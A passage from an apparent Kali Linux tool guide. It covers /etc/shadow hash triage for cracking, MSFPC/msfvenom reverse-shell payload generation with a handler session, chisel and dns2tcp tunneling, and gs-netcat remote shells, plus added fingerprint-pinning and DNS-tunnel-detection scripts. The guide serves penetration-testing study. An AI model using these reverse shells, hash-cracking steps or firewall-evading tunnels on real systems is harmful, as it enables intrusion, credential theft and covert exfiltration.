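        return {"algo": "none", "mode": None, "login_disabled": True, "crackable": False}
    for prefix, (algo, mode) in CRYPT_PREFIXES.items():
        if bare.startswith(prefix):
            return {"algo": algo, "mode": mode, "login_disabled": locked, "crackable": True}
    if re.fullmatch(r"[./0-9A-Za-z]{13}", bare):
        return {"algo": "descrypt", "mode": 1500, "login_disabled": locked, "crackable": True}
    return {"algo": "unknown", "mode": None, "login_disabled": locked, "crackable": True}


def triage_shadow(text: str) -> list:
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 9:                 # /etc/shadow rows carry exactly 9 colon-separated fields
            continue
        info = classify_hash(parts[1])
        info.update({"user": parts[0], "hash": parts[1].lstrip("!")})
        rows.append(info)
    return rows


def cracking_plan(rows: list) -> dict:
    """Group crackable hashes by the tool invocation that can consume them."""
    plan = defaultdict(list)
    for r in rows:
        if not r["crackable"]:
            continue
        key = f"hashcat -m {r['mode']}" if r["mode"] else "john --format=crypt"
        plan[key].append(f"{r['user']}:{r['hash']}")
    return dict(plan)


# --- constructed sample after the dump above; only the 'hello' row is real output ---
SAMPLE_SHADOW = """\
root:*:19974:0:99999:7:::
daemon:*:19974:0:99999:7:::
hello:$y$j9T$NODsKcm9YeFgRqGmdGhWL.$0fvMjjFmB7XR5WUiEamyohG.kpPNz2lbNI1kKT3yJzD:20019:0:99999:7:::
backup:$6$saltsalt$notarealhashjustformat000000000000000000000000000000000000000000000000000:20019:0:99999:7:::
svc:!$1$abcdefgh$notarealhash0000000000:20019:0:99999:7:::
"""


if __name__ == "__main__":
    rows = triage_shadow(SAMPLE_SHADOW)
    for r in rows:
        print(f"{r['user']:8} {r['algo']:12} locked={r['login_disabled']} crackable={r['crackable']}")
    for tool, hashes in cracking_plan(rows).items():
        print(tool, "->", len(hashes), "hash(es)")
```

The grouping is what you hand to the cracking box: sha512crypt and md5crypt rows go to hashcat with their modes, the yescrypt row to John, and the `*` rows are dropped rather than wasting GPU time on them.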
MSFPC
Automates msfvenom: generates a Metasploit payload of the chosen type together with a matching handler resource script.
■ Usage
root@kali:~# msfpc --help
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .exe // .dll]
Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.
Missing <PORT> will default to 443.
<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGELESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.
<VERBOSE> will display more information.
■ Usage example
root@kali:~# msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] Use which interface - IP address?:
[i] 1.) lo - 127.0.0.1
[i] 2.) eth0 - 192.168.11.3
[i] 3.) wan - 153.129.xxx.xxx
[?] Select 1-3, interface or IP address: 2
[i] IP: 192.168.11.3
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \
--platform python -e generic/none -a python LHOST=192.168.11.3 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'
[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
# Start msfconsole with the generated resource script
root@kali:~# msfconsole -r python-shell-stageless-reverse-tcp-443-py.rc
[*] Processing python-shell-stageless-reverse-tcp-443-py.rc for ERB directives.
resource (python-shell-stageless-reverse-tcp-443-py.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set PAYLOAD python/shell_reverse_tcp
PAYLOAD => python/shell_reverse_tcp
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set LHOST 192.168.11.3
LHOST => 192.168.11.3
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set LPORT 443
LPORT => 443
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set ExitOnSession false
ExitOnSession => false
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set EnableStageEncoding true
[!] Unknown datastore option: EnableStageEncoding. Did you mean EnableContextEncoding?
EnableStageEncoding => true
resource (python-shell-stageless-reverse-tcp-443-py.rc)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.11.3:443
# Run the generated Python script on the target host to establish the session
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (192.168.11.3:443 -> 192.168.11.4:37204) at 2024-10-24 07:36:38 +0000
Post-Exploitation Tools
Intercepting, Tunneling and Port Forwarding
Chisel
Establishes a secure tunnel between a server and a client over WebSocket (HTTP transport), with optional SOCKS5 and reverse port forwarding.
■ Usage
root@kali:~# chisel server --help
Usage: chisel server [options]
Options:
--host, Defines the HTTP listening host – the network interface
(defaults the environment variable HOST and falls back to 0.0.0.0).
--port, -p, Defines the HTTP listening port (defaults to the environment
variable PORT and fallsback to port 8080).
--key, (deprecated use --keygen and --keyfile instead)
An optional string to seed the generation of a ECDSA public
and private key pair. All communications will be secured using this
key pair. Share the subsequent fingerprint with clients to enable detection
of man-in-the-middle attacks (defaults to the CHISEL_KEY environment
variable, otherwise a new key is generate each run).
--keygen, A path to write a newly generated PEM-encoded SSH private key file.
If users depend on your --key fingerprint, you may also include your --key to
output your existing key. Use - (dash) to output the generated key to stdout.
--keyfile, An optional path to a PEM-encoded SSH private key. When
this flag is set, the --key option is ignored, and the provided private key
is used to secure all communications. (defaults to the CHISEL_KEY_FILE
environment variable). Since ECDSA keys are short, you may also set keyfile
to an inline base64 private key (e.g. chisel server --keygen - | base64).
--authfile, An optional path to a users.json file. This file should
be an object with users defined like:
{
"<user:pass>": ["<addr-regex>","<addr-regex>"]
}
when <user> connects, their <pass> will be verified and then
each of the remote addresses will be compared against the list
of address regular expressions for a match. Addresses will
always come in the form "<remote-host>:<remote-port>" for normal remotes
and "R:<local-interface>:<local-port>" for reverse port forwarding
remotes. This file will be automatically reloaded on change.
--auth, An optional string representing a single user with full
access, in the form of <user:pass>. It is equivalent to creating an
authfile with {"<user:pass>": [""]}. If unset, it will use the
environment variable AUTH.
--keepalive, An optional keepalive interval. Since the underlying
transport is HTTP, in many instances we'll be traversing through
proxies, often these proxies will close idle connections. You must
specify a time with a unit, for example '5s' or '2m'. Defaults
to '25s' (set to 0s to disable).
--backend, Specifies another HTTP server to proxy requests to when
chisel receives a normal HTTP request. Useful for hiding chisel in
plain sight.
--socks5, Allow clients to access the internal SOCKS5 proxy. See
chisel client --help for more information.
--reverse, Allow clients to specify reverse port forwarding remotes
in addition to normal remotes.
--tls-key, Enables TLS and provides optional path to a PEM-encoded
TLS private key. When this flag is set, you must also set --tls-cert,
and you cannot set --tls-domain.
--tls-cert, Enables TLS and provides optional path to a PEM-encoded
TLS certificate. When this flag is set, you must also set --tls-key,
and you cannot set --tls-domain.
--tls-domain, Enables TLS and automatically acquires a TLS key and
certificate using LetsEncrypt. Setting --tls-domain requires port 443.
You may specify multiple --tls-domain flags to serve multiple domains.
The resulting files are cached in the "$HOME/.cache/chisel" directory.
You can modify this path by setting the CHISEL_LE_CACHE variable,
or disable caching by setting this variable to "-". You can optionally
provide a certificate notification email by setting CHISEL_LE_EMAIL.
--tls-ca, a path to a PEM encoded CA certificate bundle or a directory
holding multiple PEM encode CA certificate bundle files, which is used to
validate client connections. The provided CA certificates will be used
instead of the system roots. This is commonly used to implement mutual-TLS.
--pid Generate pid file in current working directory
-v, Enable verbose logging
--help, This help text
root@kali:~# chisel client --help
Usage: chisel client [options] <server> <remote> [remote] [remote] ...
<server> is the URL to the chisel server.
<remote>s are remote connections tunneled through the server, each of
which come in the form:
<local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>
■ local-host defaults to 0.0.0.0 (all interfaces).
■ local-port defaults to remote-port.
■ remote-port is required*.
■ remote-host defaults to 0.0.0.0 (server localhost).
■ protocol defaults to tcp.
which shares <remote-host>:<remote-port> from the server to the client
as <local-host>:<local-port>, or:
R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>
which does reverse port forwarding, sharing <remote-host>:<remote-port>
from the client to the server's <local-interface>:<local-port>.
When the chisel server has --socks5 enabled, remotes can
specify "socks" in place of remote-host and remote-port.
The default local host and port for a "socks" remote is
127.0.0.1:1080. Connections to this remote will terminate
at the server's internal SOCKS5 proxy.
When the chisel server has --reverse enabled, remotes can
be prefixed with R to denote that they are reversed. That
is, the server will listen and accept connections, and they
will be proxied through the client which specified the remote.
Reverse remotes specifying "R:socks" will listen on the server's
default socks port (1080) and terminate the connection at the
client's internal SOCKS5 proxy.
When stdio is used as local-host, the tunnel will connect standard
input/output of this program with the remote. This is useful when
combined with ssh ProxyCommand. You can use
ssh -o ProxyCommand='chisel client chiselserver stdio:%h:%p' \
user@example.com
to connect to an SSH server through the tunnel.
Options:
--fingerprint, A *strongly recommended* fingerprint string
to perform host-key validation against the server's public key.
Fingerprint mismatches will close the connection.
Fingerprints are generated by hashing the ECDSA public key using
SHA256 and encoding the result in base64.
Fingerprints must be 44 characters containing a trailing equals (=).
--auth, An optional username and password (client authentication)
in the form: "<user>:<pass>". These credentials are compared to
the credentials inside the server's --authfile. defaults to the
AUTH environment variable.
--keepalive, An optional keepalive interval. Since the underlying
transport is HTTP, in many instances we'll be traversing through
proxies, often these proxies will close idle connections. You must
specify a time with a unit, for example '5s' or '2m'. Defaults
to '25s' (set to 0s to disable).
--max-retry-count, Maximum number of times to retry before exiting.
Defaults to unlimited.
--max-retry-interval, Maximum wait time before retrying after a
disconnection. Defaults to 5 minutes.
--proxy, An optional HTTP CONNECT or SOCKS5 proxy which will be
used to reach the chisel server. Authentication can be specified
inside the URL.
For example, http://admin:password@my-server.com:8081
or: socks://admin:password@my-server.com:1080
--header, Set a custom header in the form "HeaderName: HeaderContent".
Can be used multiple times. (e.g --header "Foo: Bar" --header "Hello: World")
--hostname, Optionally set the 'Host' header (defaults to the host
found in the server url).
--sni, Override the ServerName when using TLS (defaults to the
hostname).
--tls-ca, An optional root certificate bundle used to verify the
chisel server. Only valid when connecting to the server with
"https" or "wss". By default, the operating system CAs will be used.
--tls-skip-verify, Skip server TLS certificate verification of
chain and host name (if TLS is used for transport connections to
server). If set, client accepts any TLS certificate presented by
the server and any host name in that certificate. This only affects
transport https (wss) connection. Chisel server's public key
may be still verified (see --fingerprint) after inner connection
is established.
--tls-key, a path to a PEM encoded private key used for client
authentication (mutual-TLS).
--tls-cert, a path to a PEM encoded certificate matching the provided
private key. The certificate must have client authentication
enabled (mutual-TLS).
--pid Generate pid file in current working directory
-v, Enable verbose logging
--help, This help text
■ Usage example
# Generate a private key
root@kali_1:~# chisel server --keygen - > chisel.key
# Start the server on host 1 on port 4444 (without a key file the fingerprint changes every run, so clients cannot pin it)
root@kali_1:~# chisel server --keyfile chisel.key -p 4444 --socks5 --reverse
2024/12/05 09:25:59 server: Reverse tunnelling enabled
2024/12/05 09:25:59 server: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:25:59 server: Listening on http://0.0.0.0:4444
# On host 2, start client 1 (reverse port forward: server port 2222 -> host 2's SSH)
root@kali_2:~# chisel client --fingerprint "FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=" 192.168.11.3:4444 R:2222:localhost:22
2024/12/05 09:34:09 client: Connecting to ws://192.168.11.3:4444
2024/12/05 09:34:09 client: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:34:09 client: Connected (Latency 2.109852ms)
# On host 2, start client 2 (SOCKS5 proxy terminating at the server)
root@kali_2:~# chisel client --fingerprint "FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=" 192.168.11.3:4444 socks
2024/12/05 09:34:19 client: Connecting to ws://192.168.11.3:4444
2024/12/05 09:34:19 client: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:34:19 client: Connected (Latency 295.921µs)
2024/12/05 09:34:19 client: tun: proxy#127.0.0.1:1080=>socks: Listening
# From host 1, SSH to host 2 through the reverse port forward
root@kali_1:~# ssh hello@127.0.0.1 -p 2222
hello@127.0.0.1's password:
$ hostname
kali_2
# On host 1, start ncat as a listener
root@kali_1:~# ncat -l > hello.txt
# Send a file from host 2 to host 1 through the SOCKS5 proxy
root@kali_2:~# ncat --send-only --proxy 127.0.0.1:1080 --proxy-type socks5 192.168.11.3 < hello.txt
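The `--fingerprint` value the clients above pin is, per chisel's own help, the SHA-256 of the server's ECDSA public key in base64, 44 characters with a trailing `=`. The hash is taken over the SSH wire-format public key, which is the same blob `ssh-keygen -lf` hashes, so an operator who holds the server key can recompute the fingerprint out of band and hand it to the client side instead of trusting whatever the first connection shows. The script below is an added example (not chisel's code) that does that from an OpenSSH public-key line, such as `ssh-keygen -y -f chisel.key` prints; the key blob it ships with is a constructed placeholder with the right wire layout, not a real key.

```python
"""Recompute the fingerprint chisel prints at start-up and expects in --fingerprint:
base64(SHA-256(SSH wire-format public key)), 44 characters ending in '='.
Added example, not chisel's code. Input is an OpenSSH public-key line such as
`ssh-keygen -y -f chisel.key` prints; the key blob used below is a constructed
placeholder with the right wire layout, not a real curve point."""
import base64
import hashlib
import hmac
import struct


def ssh_string(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def parse_ssh_wire(blob: bytes) -> list:
    """Split a public-key blob into its length-prefixed strings; the first is the key type."""
    fields, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + n])
        off += n
    return fields


def chisel_fingerprint(pubkey_line: str) -> str:
    """chisel's FingerprintKey: base64.StdEncoding(sha256(key.Marshal())), padding kept."""
    key_type, b64 = pubkey_line.split()[:2]
    blob = base64.b64decode(b64)
    if parse_ssh_wire(blob)[0].decode() != key_type:
        raise ValueError("key type in blob does not match the line's key type")
    return base64.b64encode(hashlib.sha256(blob).digest()).decode()


def openssh_fingerprint(pubkey_line: str) -> str:
    """`ssh-keygen -lf` prints the same digest as SHA256:<base64 without padding>,
    so the two differ only by the trailing '='."""
    return "SHA256:" + chisel_fingerprint(pubkey_line).rstrip("=")


def fingerprint_matches(expected: str, pubkey_line: str) -> bool:
    """What a client-side check should do before trusting a server: constant-time compare."""
    return hmac.compare_digest(expected, chisel_fingerprint(pubkey_line))


# --- constructed placeholder key (ecdsa-sha2-nistp256 layout, dummy point, not on the curve) ---
DUMMY_POINT = b"\x04" + bytes(range(1, 65))      # 0x04 || X || Y, 65 bytes
SAMPLE_BLOB = ssh_string(b"ecdsa-sha2-nistp256") + ssh_string(b"nistp256") + ssh_string(DUMMY_POINT)
SAMPLE_PUBKEY_LINE = "ecdsa-sha2-nistp256 " + base64.b64encode(SAMPLE_BLOB).decode() + " chisel-server"


if __name__ == "__main__":
    fp = chisel_fingerprint(SAMPLE_PUBKEY_LINE)
    print("chisel    :", fp)
    print("ssh-keygen:", openssh_fingerprint(SAMPLE_PUBKEY_LINE))
    print("pin ok    :", fingerprint_matches(fp, SAMPLE_PUBKEY_LINE))
```

Distribute the value from `chisel_fingerprint` with the client command rather than copying it from the server's first log line; if the server is ever restarted without `--keyfile`, the clients will refuse the new key instead of silently accepting a possible man-in-the-middle.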
Dns2tcp
Relays TCP connections over the DNS protocol.
■ Usage
# Server
root@kali:~# dns2tcpd --help
Usage : dns2tcpd [ -i IP ] [ -F ] [ -d debug_level ] [ -f config-file ] [ -p pidfile ]
-F : dns2tcpd will run in foreground
# Client
root@kali:~# dns2tcpc --help
Usage : dns2tcpc [options] [server]
-c : enable compression
-z <domain> : domain to use (mandatory)
-d <1|2|3> : debug_level (1, 2 or 3)
-r <resource> : resource to access
-k <key> : pre-shared key
-f <filename> : configuration file
-l <port|-> : local port to bind, '-' is for stdin (mandatory if resource defined without program )
-e <program> : program to execute
-t <delay> : max DNS server's answer delay in seconds (default is 3)
-T <TXT|KEY> : DNS request type (default is TXT)
server : DNS server to use
If no resources are specified, available resources will be printed
■ Usage example
# Host 1
# Create the configuration file
root@kali_1:~# cat > ~/.dns2tcpdrc << EOF
listen = 0.0.0.0
port = 53
user = hello
key = secret
domain = example.com
resources = ssh:127.0.0.1:22
EOF
# Start the dns2tcp server
root@kali_1:~# dns2tcpd -F -d 1
06:46:32 : Debug options.c:97 Add resource ssh:127.0.0.1 port 22
06:46:32 : Debug socket.c:54 Listening on 0.0.0.0:53 for domain example.com
Starting Server v0.5.2...
[...]
# Host 2
# Create the configuration file
root@kali_2:~# cat > ~/.dns2tcprc << EOF
domain = example.com
resource = ssh
local_port = 4430
debug_level = 1
key = secret
server = 192.168.11.4
EOF
# Start the dns2tcp client
root@kali_2:~# dns2tcpc
debug level 1
Listening on port : 4430
[...]
# SSH to host 1 through the local port the dns2tcp client listens on
root@kali_2:~# ssh hello@127.0.0.1 -p 4430
hello@127.0.0.1's password:
[...]
Last login: Thu Sep 26 07:03:07 2024 from 2001:db8::2
$ hostname
kali_1
# Capture the packets with tcpdump on the client side
root@kali_2:~# tcpdump -n -i eth0 port 53
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
# The data is carried inside DNS TXT queries and answers for the tunnel domain
06:46:16.042185 IP 192.168.11.4.45332 > 192.168.11.3.53: 17969+ TXT? AAAAAIjhAA.=auth.example.com. (46)
06:46:16.042456 IP 192.168.11.3.53 > 192.168.11.4.45332: 17969* 1/0/0 TXT "ANyYAAIjhADI2UEFGMDBVQkhJMFhSVjU" "" (92)
06:46:16.042567 IP 192.168.11.4.45332 > 192.168.11.3.53: 25829+ TXT? NyaFgAABADdGQ0M5OTQyRkFBMEM5OEFGNDEzNzI1NDA1MUFGMkJBOTg0QjIxMzA.=auth.example.com. (99)
06:46:16.042615 IP 192.168.11.3.53 > 192.168.11.4.45332: 25829* 1/0/0 TXT "ANyaFgAABAA" "" (124)
06:46:16.042701 IP 192.168.11.4.45332 > 192.168.11.3.53: 49240+ TXT? NybVsXHvAHNzaA.=connect.example.com. (53)
06:46:16.042955 IP 192.168.11.3.53 > 192.168.11.4.45332: 49240* 1/0/0 TXT "ANybVsXHvAA" "" (78)
06:46:16.043139 IP 192.168.11.4.45332 > 192.168.11.3.53: 13465+ TXT? NyYAAAABBA.example.com. (40)
06:46:16.043184 IP 192.168.11.4.45332 > 192.168.11.3.53: 9053+ TXT? NyYAAAACCFNTSC0yLjAtT3BlblNTSF85LjdwMSBEZWJpYW4tNw0K.example.com. (82)
06:46:16.043200 IP 192.168.11.4.45332 > 192.168.11.3.53: 8507+ TXT? NyYAAAADBA.example.com. (40)
06:46:16.051643 IP 192.168.11.3.53 > 192.168.11.4.45332: 13465* 1/0/0 TXT "ANyYAAAABGFNTSC0yLjAtT3BlblNTSF85LjlwMSBEZWJpYW4tMw0K" "" (107)
06:46:16.051749 IP 192.168.11.4.45332 > 192.168.11.3.53: 61386+ TXT? NyYAAQAEBA.example.com. (40)
[...]
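What makes both this capture and the iodine NULL-query capture further down detectable is not any single packet but the shape of the traffic: many queries to one zone, record types a workstation rarely asks for in bulk (TXT, NULL), and leftmost labels that are long and high-entropy because they carry encoded payload. The following script is an added example (not part of dns2tcp or iodine) that scores zones on those three indicators from tcpdump `port 53` output; the dns2tcp lines are taken from the capture above, the iodine-style NULL lines and the ordinary lookups are constructed for contrast.

```python
"""Flag DNS zones that look like tunnel endpoints (dns2tcp's TXT queries, iodine's NULL queries)
from tcpdump 'port 53' output. Added example, not part of dns2tcp or iodine. The sample lines
are constructed after the captures shown here, plus ordinary lookups for contrast."""
import math
import re
from collections import defaultdict

# One tcpdump query line: "<ts> IP <src>.<sport> > <dst>.<dport>: <id>+ [opts] <TYPE>? <qname> (<len>)"
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+?)\.(?P<dport>\d+): "
    r"(?P<id>\d+)\+ (?:\[[^\]]*\] )?(?P<qtype>[A-Z0-9]+)\? (?P<qname>\S+) \((?P<size>\d+)\)$"
)
# Record types tunnels favour for downstream capacity; rarely seen in bulk from a client.
RARE_TYPES = {"TXT", "NULL", "CNAME", "MX", "SRV", "KEY", "PRIVATE"}


def parse_query(line: str):
    """Return the fields of a query line, or None for answers and anything else."""
    m = QUERY_RE.match(line.strip())
    return m.groupdict() if m else None


def split_zone(qname: str):
    """Crude registrable domain: last two labels. Everything in front is tunnel payload space."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for c in s:
        counts[c] += 1
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def profile_zones(lines):
    stats = defaultdict(lambda: {"n": 0, "sub_len": 0, "ent": 0.0, "rare": 0, "types": set()})
    for line in lines:
        q = parse_query(line)
        if not q or q["dport"] != "53":
            continue
        zone, sub = split_zone(q["qname"])
        st = stats[zone]
        st["n"] += 1
        st["sub_len"] += len(sub)
        st["ent"] += entropy(sub)
        st["rare"] += int(q["qtype"] in RARE_TYPES)
        st["types"].add(q["qtype"])
    return stats


def score_zone(st, min_queries=5):
    """Three independent indicators; a zone needs at least two of them to be called a tunnel."""
    if st["n"] < min_queries:
        return 0, {}
    feats = {
        "mean_sub_len": st["sub_len"] / st["n"],
        "mean_entropy": st["ent"] / st["n"],
        "rare_frac": st["rare"] / st["n"],
    }
    score = (feats["mean_sub_len"] >= 20) + (feats["rare_frac"] >= 0.5) + (feats["mean_entropy"] >= 3.0)
    return score, feats


def find_tunnels(lines, threshold=2):
    """zone -> (score, features, record types) for zones at or above the threshold."""
    hits = {}
    for zone, st in profile_zones(lines).items():
        score, feats = score_zone(st)
        if score >= threshold:
            hits[zone] = (score, feats, sorted(st["types"]))
    return hits


SAMPLE_LINES = [
    # dns2tcp: TXT queries carrying encoded data in the leftmost label (from the capture above)
    "06:46:16.042185 IP 192.168.11.4.45332 > 192.168.11.3.53: 17969+ TXT? AAAAAIjhAA.=auth.example.com. (46)",
    "06:46:16.042567 IP 192.168.11.4.45332 > 192.168.11.3.53: 25829+ TXT? NyaFgAABADdGQ0M5OTQyRkFBMEM5OEFGNDEzNzI1NDA1MUFGMkJBOTg0QjIxMzA.=auth.example.com. (99)",
    "06:46:16.042701 IP 192.168.11.4.45332 > 192.168.11.3.53: 49240+ TXT? NybVsXHvAHNzaA.=connect.example.com. (53)",
    "06:46:16.043139 IP 192.168.11.4.45332 > 192.168.11.3.53: 13465+ TXT? NyYAAAABBA.example.com. (40)",
    "06:46:16.043184 IP 192.168.11.4.45332 > 192.168.11.3.53: 9053+ TXT? NyYAAAACCFNTSC0yLjAtT3BlblNTSF85LjdwMSBEZWJpYW4tNw0K.example.com. (82)",
    "06:46:16.043200 IP 192.168.11.4.45332 > 192.168.11.3.53: 8507+ TXT? NyYAAAADBA.example.com. (40)",
    # iodine-style NULL queries with long random-looking labels (constructed, different zone)
    "11:58:51.072332 IP 192.168.11.3.41204 > 192.168.11.4.53: 41211+ [1au] NULL? paaaioyq.tun.example.org. (49)",
    "11:58:51.201100 IP 192.168.11.3.41204 > 192.168.11.4.53: 41212+ [1au] NULL? 0aabv82mj2hbmnkmvflmamlbm5mugeudbmbde4mikmoaxvmpmkiytmdpdmz0cbmoumb.tun.example.org. (110)",
    "11:58:51.330400 IP 192.168.11.3.41204 > 192.168.11.4.53: 41213+ [1au] NULL? 0aacr3q9zk1mxpv7wq2n8tjd5lhc6yb0fg4hs2.tun.example.org. (80)",
    "11:58:51.460900 IP 192.168.11.3.41204 > 192.168.11.4.53: 41214+ [1au] NULL? 0aadx9hbl2kqm7vwpz3nr5tjc8yfa1ug4e6smz.tun.example.org. (80)",
    "11:58:51.590200 IP 192.168.11.3.41204 > 192.168.11.4.53: 41215+ [1au] NULL? raaakzqt.tun.example.org. (49)",
    # ordinary browsing: short labels, A/AAAA records (constructed)
    "06:47:01.000000 IP 192.168.11.4.40001 > 192.168.11.1.53: 1001+ A? www.google.com. (32)",
    "06:47:01.050000 IP 192.168.11.4.40002 > 192.168.11.1.53: 1002+ A? mail.google.com. (33)",
    "06:47:01.100000 IP 192.168.11.4.40003 > 192.168.11.1.53: 1003+ A? accounts.google.com. (37)",
    "06:47:01.150000 IP 192.168.11.4.40004 > 192.168.11.1.53: 1004+ AAAA? apis.google.com. (33)",
    "06:47:01.200000 IP 192.168.11.4.40005 > 192.168.11.1.53: 1005+ A? play.google.com. (33)",
    # answer lines are skipped by the parser
    '06:46:16.042456 IP 192.168.11.3.53 > 192.168.11.4.45332: 17969* 1/0/0 TXT "ANyYAAIjhADI2UEFGMDBVQkhJMFhSVjU" "" (92)',
]


if __name__ == "__main__":
    for zone, (score, feats, types) in find_tunnels(SAMPLE_LINES).items():
        print(f"{zone}: score={score} types={types} "
              f"sub_len={feats['mean_sub_len']:.1f} entropy={feats['mean_entropy']:.2f} rare={feats['rare_frac']:.2f}")
```

The two-label zone split is deliberately crude (a public-suffix list is the production answer), and CDN hostnames can be long, which is why length alone never triggers a hit; in practice you baseline per client and add the query rate per zone as a fourth indicator.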
Global Socket
Lets two hosts on different private networks (behind firewalls or NAT) talk to each other through the GSRN (Global Socket Relay Network).
■ Usage
root@kali:~# gs-netcat --help
gs-netcat [-skrlgvqwCTLtSDuim] [-s secret] [-e cmd] [-p port] [-d ip]
-s <secret> Secret (e.g. password).
-k <file> Read Secret from file.
-r Receive-only. Terminate when no more data.
-I Ignore EOF on stdin.
-l Listening server [default: client]
-g Generate a Secret (random)
-v Verbose. -vv more verbose. -vvv insanely verbose
-q Quiet. No log output
-w Wait for server to become available [client only]
-C Disable encryption
-T Use TOR or any Socks proxy (See gs-netcat(1))
-L <file> Logfile
-t Check if peer is listening (do not connect)
-S Act as a SOCKS server [needs -l]
-D Daemon & Watchdog mode [background]
-d <IP> IPv4 address for port forwarding
-p <port> Port to listen on or forward to
-u Use UDP [requires -p]
-i Interactive login shell (TTY) [Ctrl-e q to terminate]
-e <cmd> Execute command [e.g. "bash -il" or "id"]
-m Display man page
■ Usage example
# Host A (server)
root@kali_a:~# hostname
kali_a
root@kali_a:~# gs-netcat -l -i -s <any secret>
=Secret : ***************
=Encryption : SRP-AES-256-CBC-SHA-End2End (Prime: 4096 bits)
# Host B (client)
root@kali_b:~# hostname
kali_b
root@kali_b:~# gs-netcat -i -s <the secret given when starting the server>
=Secret : ***************
=Encryption : SRP-AES-256-CBC-SHA-End2End (Prime: 4096 bits)
=Hint : PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
┌──(root㉿kali_a)-[/]
└─# hostname
kali_a
# Host A (server)
# Traffic to the GS relay goes over TLS to port 443; the relay only carries the stream, which is encrypted end-to-end between the two peers (SRP-AES-256-CBC-SHA-End2End above)
root@kali_a:~# tcpdump -n -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
04:22:06.331438 IP 192.168.11.3.45051 > 192.168.11.1.53: 36095+ A? v.gs.thc.org. (30)
04:22:06.623812 IP 192.168.11.1.53 > 192.168.11.3.45051: 36095 1/0/0 A 135.125.107.221 (58)
04:22:06.625494 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [S], seq 196820842, win 64240, options [mss 1460,sackOK,TS val 3655078917 ecr 0,nop,wscale 7], length 0
04:22:06.906336 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [S.], seq 101136752, ack 196820843, win 29184, options [mss 1460,nop,nop,TS val 3794457547 ecr 3655078917,nop,wscale 7], length 0
